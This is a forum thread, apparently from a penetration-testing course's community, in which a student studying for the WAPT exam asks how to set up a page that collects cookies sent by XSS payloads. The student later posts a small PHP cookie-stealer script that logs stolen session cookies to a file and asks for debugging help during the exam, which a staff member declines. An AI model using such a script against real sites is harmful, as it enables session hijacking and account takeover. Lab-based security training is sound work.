Jump to content
Sign in to follow this  
cr8syoki

Creating an attacker.site page?

Recommended Posts

cr8syoki

I am attempting to make a page that will catch session ID's/cookies from XSS payloads and to use for some of the XSRF tutorials like in the videos for the WAPT cert.  I have created a few barebones pages myself to test on, and would like to use something similar instead of the given sites for the labs.

Anyone have any experience in this or pointers? I have searched google for creating a page like this, but have come up empty.

Share this post


Link to post
dimitrios

Hi @cr8syoki,

Please describe the scenario you are trying to implement and I will guide you through the process...

What steps does the attack you are trying to implement involve?

 

 

Share this post


Link to post
cr8syoki

I would like to set up the page for xss payloads similar to those that we see in our labs here that send the cookies back to a site that has a .txt file on it.

My instinct tells me I may need to go through one of the free web hosting sites, but I am not sure if the sites can be used for that.

I would like to get past just the normal xss payloads and learn to send the info to the site that would be on a local server.

As I progress, I would like to have this handy for testing remote file inclusion payloads in my personal home lab.

Much appreciated for the response. I have tried a number of ways to google/research this before I posted.

Share this post


Link to post
caneacsu

Everything you need to know to make this work is thought in the course. If you went through the labs and understood them, you should be in good shape to replicate some of the functionalities in your own lab. 

Share this post


Link to post
cr8syoki

Apologies for re-opening this thread. I was able to create a php cookie stealer using localhost for the php page. I am using the following:

<?php
$cookie = $_GET['cookie'];
$log = fopen("log.txt", "a");
fwrite($log, $cookie ."\n");
fclose($log);
?>

This file is named steal.php  I have also created a blank file named log.txt and  chmod 777 that file. I moved both files into the same directory under /var/www/html/stealer/

So it would appear as 127.0.0.1/stealer/steal.php

I am currently taking the exam and have found areas I believe will have the admin browsing the site to steal the cookies. Upon starting apache and inserting my payload, I am not seeing anything in the log.txt.  I have also tried this payload in webgoat to see if it is my code or the exam.  Obviously it appears I have messed up somewhere in my code.

@dimitrios or if someone else that may have a few pointers could let me know where I went wrong it would be greatly appreciated. I have seen the more elaborate php scripts to also steal IP addresses, user-agent, etc. I just did not find those necessary at the time.  Just to note, I did have a short period on the exam where I believe my time was suspended, but I do not believe that has anything to do with the payload or needing to reset the exam.

If this needs to be moved to the exam faq's please let me know.

Share this post


Link to post
dimitrios

@cr8syoki

If you are taking the exam as we speak. We cannot comment on the code you are using to solve the exam's challenges....

Share this post


Link to post

Please sign in to comment

You will be able to leave a comment after signing in



Sign In Now
Sign in to follow this  
×